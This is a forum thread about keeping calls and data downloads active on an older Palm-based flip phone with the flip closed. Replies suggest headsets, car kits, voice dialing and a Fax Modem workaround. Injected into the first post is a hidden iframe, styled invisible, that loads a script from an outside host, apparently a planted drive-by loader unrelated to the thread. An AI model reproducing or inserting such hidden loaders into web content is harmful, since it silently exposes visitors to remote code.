Continue call with flip closed -??

Is it possible to keep a phone call active after closing the flip - ala speakerphone? I can't seem to do it, my calls end as soon as I close the phone.

Same thing for downloading e-mail. I would like to start the e-mail download, and close the flip so I can drp the phone into my shirt pocket whilst it downloads. As a "multi-tasker" this would be a big convenience.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The only time I've seen a call stay "live" with the flip closed is when you have the phone hooked up to the hands-free car kit.

Also, I think I've used a PQA before and the phone did not disconnect the data call when the flip was closed. I think that was just a glich, though. The hands-free instance is by design.

You could try starting the call, close the flip while dialing, then have the entire conversation with the flip closed.

The details are foggy for the circumstances required in order for this to work, but it does.

I know that when in the phone's main menu, if I press the green phone button, the voice recognizer starts, I can then close the flip, say the name and have the phone dial and have the conversation while the flip is closed. If you need to initiate the hanging up, then you'll have to open the flip to end the call, otherwise I just let the other party hang up for me.

Use a headset

The only way I know to have a call and have the phone closed is to use a headset. I don't believe the phone was designed to have a speakerphone conversation with it closed without a headset or hands free car unit.

Sorry!

Here's how..............

I found this out quite by accident, but it only takes a few steps.

1) Set your phone up in the Fax Modem configuration.

2) Press the Red phone key to bring up the phone side of the phone.

3) Start the Speakerphone. This is optional, but I don't know how you could talk to someone with the flip closed without the speakerphone on.

Place a call--then when you connect close the flip. The call will continue.

To end the call, you need to open the flip and hit the Red phone key.

It's important to note, as long as the Fax Modem remains active in the background, the flip will not end a call.

To get out of this configuration, hit the Home icon to bring up the Palm side of the phone. Once you do that, the flip will work properly again.

I've started using the Fax Modem extensively, and you can close the flip while making Data Calls. It makes for a neater package when using the Wireless Modem.

I haven't tried this with a Web Browser, so I don't know if you can continue downloading files.

One last thing.....This works when you put the phone in Fax Modem configuration WITHOUT placing a data call. If you are using the phone as a modem and you get an incoming call, then closing the flip ends the voice call, but it doesn't end the data call.
